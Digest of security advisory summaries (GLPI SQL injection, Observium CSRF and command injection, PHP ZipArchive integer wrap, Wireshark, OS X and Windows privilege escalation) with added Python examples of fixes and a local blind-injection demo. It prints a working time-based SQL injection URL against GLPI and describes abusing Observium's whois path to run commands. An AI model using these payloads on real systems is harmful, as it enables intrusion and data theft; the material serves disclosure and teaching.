High-Tech Bridge Security Research Lab discovered a high-risk SQL injection vulnerability in GLPI, a popular Information Resource Manager (IRM) system. IRM systems are typically used to manage and audit software packages and to provide an ITIL-compliant service desk. The vulnerability allows a remote, unauthenticated attacker to execute arbitrary SQL queries, read and write data in the application's database, and completely compromise the vulnerable system. It exists because user-supplied data passed via the "page_limit" HTTP GET parameter to the "/ajax/getDropdownConnect.php" script is insufficiently filtered: a remote unauthenticated attacker can alter the existing SQL query and inject and execute arbitrary SQL commands against the application's database. Below is a simple SQL injection exploit using a time-based technique; the page load time will be significantly higher if the MySQL version is 5.x or later: http://[host]/ajax/getDropdownConnect.php?fromtype=Computer&itemtype=Computer&page=1&page_limit=1%20PROCEDURE%20analyse%28%28select%20extractvalue%28rand%28%29,concat%280x3a,%28IF%28MID%28version%28%29,1,1%29%20LIKE%205,%20BENCHMARK%285000000,SHA1%281%29%29,1%29%29%29%29,1%29
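The following Python script is an added example, not part of the original advisory and not GLPI's code. It models the flaw with SQLite: a hypothetical dropdown handler that splices page_limit straight into LIMIT, a blind oracle that leaks the database version through that parameter one character at a time (the same inference the BENCHMARK probe above performs by timing, done here by row count because SQLite has no BENCHMARK), and a hardened handler that validates the integer and binds it. The table and rows are constructed. One caveat the payload above illustrates: MySQL's LIMIT does not accept expressions, which is why the exploit reaches one through PROCEDURE ANALYSE, whereas SQLite evaluates expressions in LIMIT/OFFSET directly.

```python
import sqlite3

# Constructed sample rows (not GLPI data): a stand-in for the table
# the dropdown query reads.
SAMPLE_COMPUTERS = [("ws-01",), ("ws-02",), ("ws-03",)]


def make_db():
    """In-memory SQLite database standing in for the application's MySQL backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE computers (name TEXT)")
    conn.executemany("INSERT INTO computers VALUES (?)", SAMPLE_COMPUTERS)
    return conn


def vulnerable_dropdown(conn, page_limit):
    """Hypothetical handler with the advisory's flaw: page_limit is spliced
    verbatim into the query, so anything after the number is parsed as SQL."""
    sql = f"SELECT name FROM computers ORDER BY name LIMIT {page_limit}"
    return [row[0] for row in conn.execute(sql)]


def is_valid_page_limit(page_limit, max_limit=100):
    """Accept only a plain decimal integer within bounds."""
    if not isinstance(page_limit, str) or not page_limit.isdigit():
        return False
    return 1 <= int(page_limit) <= max_limit


def hardened_dropdown(conn, page_limit, max_limit=100):
    """Validated integer, then bound as a parameter: user input is never parsed as SQL."""
    if not is_valid_page_limit(page_limit, max_limit):
        raise ValueError("page_limit must be an integer between 1 and %d" % max_limit)
    sql = "SELECT name FROM computers ORDER BY name LIMIT ?"
    return [row[0] for row in conn.execute(sql, (int(page_limit),))]


def blind_oracle(conn, condition):
    """One yes/no question to the database through the LIMIT clause.
    A true condition keeps OFFSET 0 (one row comes back); a false one skips
    past every row (nothing comes back)."""
    payload = f"1 OFFSET (CASE WHEN ({condition}) THEN 0 ELSE 1000000 END)"
    return len(vulnerable_dropdown(conn, payload)) == 1


def extract_version(conn, alphabet="0123456789.", max_len=32):
    """Recover sqlite_version() one character at a time: the blind-injection
    equivalent of the advisory's MID(version(),1,1) LIKE 5 probe."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            if blind_oracle(conn, f"substr(sqlite_version(), {pos}, 1) = '{ch}'"):
                recovered += ch
                break
        else:
            break  # no candidate matched: end of the string
    return recovered


def real_version(conn):
    """Ground truth to compare the leaked value against."""
    return conn.execute("SELECT sqlite_version()").fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    print("normal request:", vulnerable_dropdown(db, "2"))
    print("leaked via LIMIT injection:", extract_version(db), "real:", real_version(db))
    print("hardened handler accepts payload?",
          is_valid_page_limit("1 OFFSET (CASE WHEN 1 THEN 0 ELSE 1000000 END)"))
```

Run as a script, it prints the version leaked through the LIMIT clause next to the real one; the hardened handler rejects the same payload before any query is built.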
A static out-of-bounds memory read vulnerability was discovered in Wireshark, a free and open-source packet analyzer. It can be triggered by feeding a malformed file to tshark, can be observed in an ASAN build of Wireshark, and leads to a crash.
A crash due to an assertion failure can be observed in an ASAN build of Wireshark (current git master) by feeding a malformed file to tshark. The crash occurs when the alloc_address_wmem function is called with a NULL addr_data parameter.
This exploit targets RATS 2.3, the Rough Auditing Tool for Security. It triggers an out-of-block array crash: an array declared outside of its block scope causes the program to crash when it is run.
Merit Lilin Enterprise Co., Ltd. has released a security advisory for multiple vulnerabilities in its L series products running firmware 1.4.36/1.2.02 (OS version: Linux 2.6.38/Linux 2.6.32). The vulnerabilities include multiple cross-site request forgery issues, multiple cross-site scripting/HTML injection issues, hard-coded credentials, cleartext sensitive data, weak passwords/known credentials, account lockout, and poorly protected credentials. They affect the device's administrative interface, authentication, and authorization.
Either via CSRF or by directly editing the whois binary field in the Observium web UI under Settings -> System Path, an attacker can change the path for whois, mtr, or nmap to any bash command. Requesting http://<ObserviumIP>/netcmd.php?cmd=whois&query=8.8.8.8 as any Observium user (even a low-privileged one) then executes that command. For example: set up a listener, then deliver the path change via CSRF.
Observium is a low-maintenance, auto-discovering network monitoring platform supporting a wide range of device types, platforms and operating systems, including Cisco, Windows, Linux, HP, Juniper, Dell, FreeBSD, Brocade, Netscaler, NetApp and many more. Due to the lack of CSRF protection, it is possible to create an additional administrator user or to change the current administrator's password; the password change does not ask for the previous password.
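The following Python module is an added example, not Observium's code, showing the two controls whose absence the two Observium entries above describe: a per-session CSRF token plus an Origin check that gates every state-changing request (adding a user, changing a password, and by extension the System Path settings), and a password change that demands the current password so that a riding session alone is not enough. The in-memory session and user stores, the host name observium.example, the form field names and the evil.example origin are all constructed for the example.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Constructed in-memory stores (not Observium's schema).
SESSIONS = {}  # session id -> {"user": ..., "csrf": ...}
USERS = {"admin": {"password": "correct horse battery", "level": 10}}
EXPECTED_HOST = "observium.example"  # assumed deployment host


def start_session(username):
    """Log a user in and mint a per-session CSRF token alongside the cookie."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": username, "csrf": secrets.token_urlsafe(32)}
    return sid


def same_origin(headers, expected_host=EXPECTED_HOST):
    """Reject cross-site requests by Origin (falling back to Referer). The victim's
    browser attaches these to a forged POST; the attacker's page cannot forge them."""
    origin = headers.get("Origin") or headers.get("Referer")
    if not origin:
        return False
    return urlparse(origin).netloc == expected_host


def valid_csrf_token(session, form):
    """Constant-time comparison of the submitted token against the session's."""
    submitted = form.get("csrf_token", "")
    return hmac.compare_digest(submitted.encode(), session["csrf"].encode())


def authorize_state_change(sid, headers, form):
    """Gate for every state-changing request: live session, same origin, matching token."""
    session = SESSIONS.get(sid)
    if session is None:
        return False, "no session"
    if not same_origin(headers):
        return False, "cross-origin request"
    if not valid_csrf_token(session, form):
        return False, "missing or wrong csrf token"
    return True, session["user"]


def add_user(sid, headers, form):
    ok, who = authorize_state_change(sid, headers, form)
    if not ok:
        return False, who
    if USERS[who]["level"] < 10:
        return False, "admin only"
    USERS[form["username"]] = {"password": form["password"], "level": int(form["level"])}
    return True, "user added"


def change_password(sid, headers, form):
    """Re-authenticate: the current password is required in addition to the CSRF checks."""
    ok, who = authorize_state_change(sid, headers, form)
    if not ok:
        return False, who
    user = USERS[who]
    current = form.get("current_password", "")
    if not hmac.compare_digest(current.encode(), user["password"].encode()):
        return False, "current password incorrect"
    new = form.get("new_password", "")
    if len(new) < 12:
        return False, "new password too short"
    user["password"] = new
    return True, "password changed"


def demo():
    """Constructed requests: a forged cross-site POST versus the legitimate form."""
    sid = start_session("admin")
    token = SESSIONS[sid]["csrf"]
    # The forged request rides the admin's cookie but carries neither the token
    # nor a same-origin Origin header.
    forged = add_user(sid, {"Origin": "https://evil.example"},
                      {"username": "backdoor", "password": "x", "level": "10"})
    # The legitimate submission from the application's own page carries both.
    legit = add_user(sid, {"Origin": "https://observium.example"},
                     {"csrf_token": token, "username": "ops",
                      "password": "long-enough-password", "level": "5"})
    return forged, legit
```

The Origin check alone stops the forged request in the demo; the token check is what still protects a deployment whose clients strip Origin and Referer, which is why both are applied.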
An integer wrap may occur in PHP 7.x before version 7.0.6 when reading zip files with the getFromIndex() and getFromName() methods of ZipArchive, resulting in a heap overflow. sb.size at (1) comes from the zip_stat_t *st fields zip_uint64_t uncomp_size; /* (cl) size of uncompressed data */ and zip_uint64_t size; /* size of file (uncompressed) */, whereas len is signed and has a platform-dependent size. When len is larger than sb.size, len is truncated to sb.size at (2), and the heap overflow occurs at (3).
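The following Python snippet is an added example, not PHP's or libzip's source, that models the arithmetic behind the wrap using ctypes for the C conversions: an untrusted 64-bit uncompressed size stored into a signed C long of 32 or 64 bits, an allocation computed from len + 1, and a read driven by the original 64-bit size. That shape for the read is an assumption; the exact statements at (1), (2) and (3) are not reproduced. The checked variant shows the bound such a conversion needs before the value ever reaches a signed variable.

```python
import ctypes

# Fixed-width C integer types so both a 32-bit and a 64-bit build can be modelled
# on whatever platform runs this script.
SIGNED = {32: ctypes.c_int32, 64: ctypes.c_int64}
UNSIGNED = {32: ctypes.c_uint32, 64: ctypes.c_uint64}


def c_signed(value, bits):
    """What storing a uint64 into a signed integer of `bits` width yields in C
    (two's-complement wraparound, as GCC and Clang implement it)."""
    return SIGNED[bits](value).value


def c_unsigned(value, bits):
    """Unsigned (size_t-style) arithmetic of `bits` width: wraps modulo 2**bits."""
    return UNSIGNED[bits](value).value


def naive_plan(declared_size, long_bits):
    """Vulnerable arithmetic modelled here (assumed shape, not PHP's statements):
    len = (long)size; buffer = alloc(len + 1); read `size` bytes into buffer.
    Returns (len, allocation_bytes, bytes_read)."""
    length = c_signed(declared_size, long_bits)
    allocation = c_unsigned(length + 1, long_bits)
    return length, allocation, declared_size


def overflows(plan):
    """The heap overflow condition: more bytes read than were allocated."""
    length, allocation, bytes_read = plan
    return bytes_read > allocation


def checked_plan(declared_size, long_bits, max_entry=64 * 1024 * 1024):
    """Hardened: validate the 64-bit value against the platform's signed maximum
    and an application limit first; return None to refuse the entry."""
    long_max = 2 ** (long_bits - 1) - 1
    if declared_size > long_max or declared_size > max_entry:
        return None
    return declared_size, declared_size + 1, declared_size


# Constructed cases: (declared uncompressed size, width of the build's long).
CASES = {
    (2**64 - 1, 64): "64-bit build: len becomes -1, len + 1 wraps to a 0-byte allocation",
    (2**32 + 16, 32): "32-bit build: len truncates to 16, 17 bytes allocated, 4 GiB + 16 read",
    (1024, 64): "benign 1 KiB entry",
}


def run_cases():
    """For each case: does the naive path overflow, and does the checked path accept it?"""
    results = {}
    for (size, bits), _desc in CASES.items():
        plan = naive_plan(size, bits)
        results[(size, bits)] = (overflows(plan), checked_plan(size, bits) is not None)
    return results


if __name__ == "__main__":
    for key, desc in CASES.items():
        print(desc, "->", naive_plan(*key), "overflow:", overflows(naive_plan(*key)),
              "checked accepts:", checked_plan(*key) is not None)
```

The two hostile cases show the two faces of the same bug: on a 64-bit build the size becomes negative and the allocation wraps to nothing, on a 32-bit build the high bits are simply dropped and a small buffer meets a huge read.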
Mach Race is a universal OS X local privilege escalation exploit (CVE-2016-1757) that works against SUID binaries, SIP, and binary entitlements. It exploits a race condition in the Mach bootstrap subsystem: the exploit creates a Mach service with a predictable name and then races the kernel to register a receive right for that service. Used against a SUID binary or an entitled binary, it bypasses SIP. It was tested against Mavericks, Yosemite 10.10.5, and El Capitan 10.11.2 and 10.11.3, and is fixed in El Capitan 10.11.4; it should work against all earlier OS X versions.
The CSRSS BaseSrv RPC call BaseSrvCheckVDM allows creating a new process with the anonymous token, which results in a new process in session 0 that can be abused to elevate privileges.